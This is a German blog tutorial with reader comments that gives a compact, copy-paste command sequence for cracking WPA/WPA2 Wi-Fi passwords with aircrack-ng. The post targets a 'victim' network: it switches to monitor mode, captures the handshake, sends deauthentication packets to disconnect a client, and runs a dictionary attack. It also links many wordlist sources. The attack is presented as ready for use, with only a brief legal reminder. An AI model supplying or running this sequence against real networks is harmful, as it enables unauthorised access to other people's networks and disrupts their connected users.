
WiFi
Diesmal aus der Quick&Dirty Tutorial Serie: Schnell und einfach WPA1/WPA2 “hacken”. Ein Tutorial zum ausdrucken und überall mitnehmen. Dieser Hackguide ist kurz, umfassend und sehr effizient! Ich empfehle allerdings für Anfänger mein ausführlicheres Aircrack-ng WPA und WPA2 Crack Tutorial. Diese Version ist wirklich für portable Zwecke gedacht und ggf. zum direkten einfügen der Befehle in das Terminal von Ubuntu Linux. Diese Anleitung funktioniert allerdings nur mit einem angemeldeten Clienten im Wlan. (>>Hier gehts zur WEP Version)
Mein System:
Ubuntu 8.10 x86 32Bit mit Intel WiFi Link 5100 (Centrino2) Wlan Adapter
Aircrack-ng 32Bit Version
Wlan Adapter Name “wlan0″ bzw. “mon0″
BSSID des Opfer Wlans : 7E:40:80:00:14:6C
ESSID des Wlands: “testwlan” WPA2-PSK verschlüsselt
Wlan MAC des Clienten: AA:0F:B5:B2:BC:82
Meine “Wlan0″ Adapter Mac Adresse: 00:0F:AC:82:AC:82
Alle Befehle bitte als root ausführen! Sprich vor jedem Befehl ein “sudo” dransetzen oder gleich von Anfang an “sudo -s” eingeben und alle weiteren “sudo” Befehle vernachlässigen. Alle Befehle sind in einer Zeile geschrieben bitte lasst euch nicht vom Zeilenumbruch hier auf dieser Website irritieren!
0. Opfer Wlan suchen mit “airodump-ng”
sudo airodump-ng wlan0
1. Karte in Monitor Mode mit “airmon-ng” (z.B. Channel 6 für Opfer Wlan)
sudo airmon-ng start wlan0 6
Jetzt nur noch mon0 als Adapter Alias Namen für die Befehle verwenden!
1.1 Karte in Monitor Mode mit iwconfig und ifconfig (mit z.B. Channel 6 für Opfer Wlan)
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo iwconfig wlan0 channel 6 sudo ifconfig wlan0 up
Jetzt einfach wlan0 weiter als Adapter Alias Namen verwenden bei den Befehlen!
2. Datenpakete bzw. Handshakes Sammeln mit “airodump-ng”
sudo airodump-ng -c 6 -w output --bssid 7E:40:80:00:14:6C wlan0
3. Es werden 8 DeAuth Pakete versenden mit “aireplay-ng”
sudo aireplay-ng -0 8 -a 7E:40:80:00:14:6C -c AA:0F:B5:B2:BC:82 wlan0
Sobald der Handshake aufgezeichnet wurde, benutzen wir direkt “aircrack-ng” um das Passwort herauszufinden.
4. Key aus dem Handshake cracken mit “aircrack-ng”
sudo aircrack-ng -a 2 -b 7E:40:80:00:14:6C -e testwlan -w <wordlist> *.cap
Fertig!
mit “-w <wordlist>” gebt ihr den Pfad zu eurer Wordlist/Rainbowtable an. Falls das Passwort zu komplex ist, sprich eine belibige Kombination von Buchstaben und Zahlen, könnt ihr es gleich vergessen. Wobei es inzwischen die “Möglichkeit” gibt mittels CUDA und Pyrit eine Bruteforce Attacke in sehr hoher Geschwindigkeit durchlaufen zu lassen. Zufallsgeneration von Kombinationen sind z.B. mit John TR Outputs möglich. Inzwischen ist es sogar möglich, ganz Wikipedia als Wordlist zu nutzen.
Wordlisten Links findet ihr hier:
- ftp://ftp.openwall.com/pub/wordlists/
- http://www.openwall.com/mirrors/
- ftp://ftp.ox.ac.uk/pub/wordlists/
- http://gdataonline.com/downloads/GDict/
- http://www.theargon.com/achilles/wordlists/
- http://theargon.com/achilles/wordlists/theargonlists/
- ftp://ftp.cerias.purdue.edu/pub/dict/
- http://www.outpost9.com/files/WordLists.html
- http://www.securinfos.info/wordlists_dictionnaires.php
- http://www.vulnerabilityassessment.co.uk/passwords.htm
- http://packetstormsecurity.org/Crackers/wordlists/
- http://www.ai.uga.edu/ftplib/natural-language/moby/
- http://www.insidepro.com/eng/download.shtml
- http://www.word-list.com/
- http://www.cotse.com/tools/wordlists1.htm
- http://www.cotse.com/tools/wordlists2.htm
- http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml
- http://wordlist.sourceforge.net/
Oder bastelt euch eure eigene Wordlist mit:
- https://code.goto10.org/svn/unpacked/sh/etemenanki/etemenanki.sh
- http://awlg.org/index.gen
- http://forum.aircrack-ng.org/index.php?topic=4580.0
- http://forum.aircrack-ng.org/index.php?topic=4877.msg27435#msg27435
Jedenfalls wünsche ich viel Spaß und beachtet die geltenden Gesetze – Euer SuperKato Team!
Zur Diskussion im Forum: Hier Klicken!
Download: Die Anleitung zum Ausdrucken als PDF Version (DIN A4 Format):
SuperKato Tutorial: Quick & Dirty WPA WPA2 Cracking (73,9 KiB, 8.764 hits)
Nachtrag:
Kinder, wenn ihr Fragen habt wieso schreibt ihr nicht einfach ins Forum? Dort muss man sich nicht mal anmelden, damit ihr es bequemer habt?! Dort sind zwei Informatiker unterwegs, die extra für die Beantwortung eurer Fragen bezahlt werden!!
>>>>FORUM (Rubrik Security)
BTW: Bitte promotet das Forum! Es hat wirklich QUALITÄT – nur zuwenig User!
Ist es möglich eine beschreibung für Anfänger zu erstellen?
Ich nutze xubuntu via USB……Danke!
Im FORUM bitte deine Frage stellen, dort wird SOFORT geholfen! http://forum.superkato.net
du brauchst dich auch nicht anmelden!
einfach oben auf FORUM klcken!!
und finde ich:
“ausführlicheres Aircrack-ng WPA und WPA2 Crack Tutorial”
Gruss.
Hallo,
Ich würde auch zu gern den ausführlichen bericht bzw. das torurial lessen.
Kannst du uns eine Hinweis geben wo wir es finden?
Gruss
Geht das auch mit einem gewöhlichen Wireless USB Stick ?
Und wo soll man die Befehle eingeben ?
Mit Edding auf ein Papier schreiben und jeweils 3 Sekunden vor die Webcam halten.
Well-loved. Like or Dislike:
6
0
Zum Beispiel
die Befehle gibst du im Terminal ein LOL
warum unter punkt 1.1 nochmal die karte in monitor mode setzen ?
das macht doch schon 1. “airmon-ng start wlanXXX #”
mit “airmon-ng” sieht man dann > wlan0 blabla ; mon0 blabla
manchma klappts nicht.
Ich mach alles nach der Anleitung, aber beim letzten Befehl steht dann
“No file to crack specified”
was soll ich machen??
hilfe
ich hab die cap datei genauso eingegeben wies bei mir dann am ende steht
Wie siehts denn mit XP aus?
Welche Wlan karten sind mit Nettumbler kompatible????
oh mann so viele dumme Fragen hab ich noch nie auf einen Haufen gesehen.
Hola zusammen,
schick schick deine Anleitung! Vorallem das zusammenfassen der einzelnen Strings- damit spart man sich ne menge Arbeit
Ich bin gerade dabei zu beweisen das mein WPA2 mit 28stellen Buchstaben-Ziffern gemisch gecrackt wurde und damit illegale Sachen betrieben wurden. Da ich eine Firma mit verdammt vielen WLAN-abhängigen Geräten betreibe, fiel es mir leider erst sehr spät auf, daraufhin hab ich ALLES auf Auslieferung zurückgestellt- wollte ja niemanden etwas böses Unterstellen- leider war das wohl Vorsatz- jetzt kommt ne Klage mit rund 20.000 € auf mich zugeflogen! Da gilt es zu beweisen das es DOCH möglich ist ohne 100 Jahre Wartezeit aufs PW.
Leute, passt auf was ihr tut! Wenn man Sicherheitslücken aufdecken möchte, ist das nutzen der besagten Programme durchaus legitim!
Viele Grüße
Echt schlimm was manche Leute hier von sich geben… Lernt erstmal ein bisschen mit Linux umzugehen und Crackt erstmal WEP bevor ihr euch an WPA2 versucht!!! Wenn ich schon sowas von XP lese oder “wo soll ich die Befehle eingeben?” omg leute, das darf doch net wahr sein
Hey ne Frage,
wie müssen die Wörter in der Wordlist angeordnet sein? Untereinander, sprich Zeile für Zeile oder hintereinander und aneinander?
Ach nochwas,
Zahlen muss ich auch noch dazu schreiben oder mach er das selber?
Danke erstmal – echt richtig super Tutorial!!!
Und @HAHA!!!
Die Wörter müssen untereinander angeordnet sein.
lol schaut mal youtube da gibts diverse tutorials ;3
die sind zum teil alle von mir lol
1. Gute Anleitung
2. Danke dafür
3. MICH KOTZEN DIESE SELBSTGEFÄLLIGEN TROTTEL HIER IM FORUM AN, DIE SICH OB DER NACHFRAGEN ANDERER DARÜBER LUSTIG MACHEN!!! ICH GLAUBE, JEDER HAT MAL “KLEIN” ANGEFANGEN!!! ODER HABT IHR ETWA SCHON ALLE DAS GEWUSST, WAS IHR HEUTE WISST, ALS IHR NOCH IN EURE WINDELN GESCHISSEN HABT???? HALTET EINFACH MAL DIE FRESSE UND LASST DIE LEUTE NACHFRAGEN. DAFÜR IST DAS FORUM IMMERHIN DA – ZUM MEINUNGS- UND ERFAHRUNGSAUSTAUSCH.
Klaus
-sudo u fail all
-ps ux
-kill pid dich
bin auch der meinung das man leuten helfen sollte wenn sie wo anstehen, aber wen mir der befehl “sudo” nix sagt und ich nicht weiss wo ich befehle eingeben sollte dann wäre es besser mal die besagten systeme kennenzulernen und sich mit dem offensichtlichen zu beschäftigen bevor ich mich in die tiefen des nicht offensichtlichen wage! lernt mal eure betriebsysteme kennen und danach, schwelgt ein wenig im thema netzwerktechnik, ***nix, transferprotokoll, datenpakete/handshakes, verschlüsselung, usw… dann werdet ihr annähernd verstehen um was es hier wirklich geht. es reicht nicht blind commands einzutippen man muss auch wissen was sie tun und warum man sie eintippt
…
)))
und nicht vergessen wenn man in (fremde) netzwerke eindringt macht man sich strafbar also sollte ich auch genau wissen was ich für spuren hinterlasse… aber zu dem wirds ja wohl nie kommen wenn ich mir eure comments ansehe
das freut mich! Man brauch vorerfahrung, das stimmt aber bitte schreibt doch einfach ins FORUM (KLICK OBEN AUF FORUM) da könnt ihr eure fragen in der RUBRIK SECURITY OHNE ANMELDUNG stellen und ich beantworte sie solange bis euch jedem geholfen ist!
Ich muss das Forum vorrantreiben. Dies hier dient nur zu Kommentarzwecken a la – cool- danke – super- igitt…!
LG SK
wollte im forum schreiben aber bekomme die meldung fehlerhafte antwort. bei der umfrage welche karte ich hätte. naja intel 4965agn..
ja weil unten eine Frage steht die beantwortet werden muss als Captcha…wenn du keinen Account hast.
[...] [...]